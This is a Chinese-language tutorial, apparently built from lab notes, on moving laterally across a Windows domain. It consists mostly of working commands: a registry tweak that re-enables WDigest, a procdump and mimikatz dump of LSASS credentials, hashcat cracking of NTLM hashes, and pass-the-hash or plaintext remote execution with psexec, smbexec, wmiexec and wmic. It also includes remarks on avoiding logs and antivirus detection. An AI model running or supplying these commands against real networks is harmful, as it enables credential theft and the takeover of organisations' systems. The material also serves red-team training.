内网安全-域横向smb&wmi明文或hash传递

QQ截图20220518093940.jpg

  • Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
  • Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  1. 利用哈希hash传递(pth,ptk等)进行移动
  2. 利用其它服务协议(SMB,WMI等)进行哈希移动
  3. 利用注册表操作开启Wdigest Auth值进行获取
  4. 利用工具或第三方平台(Hachcat)进行破解获取
#注册表操作开启Wdigest Auth值
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  • Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash
#获取win密码hash的两个工具
Pwdump7
QuarksPwdump
  • 域用户与本地用户的区别,比如,god/administrator是域用户,./administrator是本地用户

Procdump+Mimikatz配合获取

# procdump 在目标机上执行
procdump -accepteula -ma lsass.exe lsass.dmp

# mimikatz 在本地执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
  • 首先执行以下命令,在当前目录下生成lsass.dmp文件

QQ截图20220518100357.jpg

QQ截图20220518100406.jpg

  • 然后mimikatz上执行以下命令,找到密码

QQ截图20220518100434.jpg

QQ截图20220518100444.jpg

Hashcat破解获取Windows NTML Hash

hashcat -a 0 -m 1000 hash file --force //爆破命令

域横向移动SMB服务利用-psexec,smbexec

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放

#psexec第一种:先有ipc链接,psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

#psexec第二种:不用建立IPC直接提供明文账户密码(推荐)
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

#smbexec工具:
#非官方自带-参考impacket工具包使用,操作简单,容易被杀
#smbexec无需先ipc链接 明文或hash传递
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21
  • psexec第一种:先有ipc链接,psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

QQ截图20220518102423.jpg

  • psexec第二种:不用建立IPC直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

QQ截图20220518102453.jpg

  • hash密码,报错。原因是微软官方Pstools工具包中的psexec无法采用hash连接,只能明文连接

QQ截图20220518102507.jpg

QQ截图20220518103239.jpg

  • 如果需要hash连接的话,可以下载第三方的impacket工具包。但是impacket工具包也有缺点,那就是很有可能会被查杀。

QQ截图20220518103301.jpg

  • smbexec无需先ipc链接 明文或hash传递
smbexec god/administrator:Admin12345@192.168.3.21

QQ截图20220518103328.jpg

smbexec ./administrator:admin!@#45@192.168.3.32

QQ截图20220518103350.jpg

smbexec -hashes :$HASH$ ./admin@192.168.3.21

QQ截图20220518103403.jpg

域横向移动WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹

#自带WMIC 明文传递 优点是自带工具,不用考虑免杀,缺点是无回显
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

#自带cscript明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

#套件impacket wmiexec 明文或hash传递 有回显exe版本 易被杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

QQ截图20220518103816.jpg

QQ截图20220518103826.jpg

  • 自带cscript 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

QQ截图20220518103849.jpg

  • 套件impacket wmiexec 明文或hash传递 有回显exe版本 易被杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

QQ截图20220518103918.jpg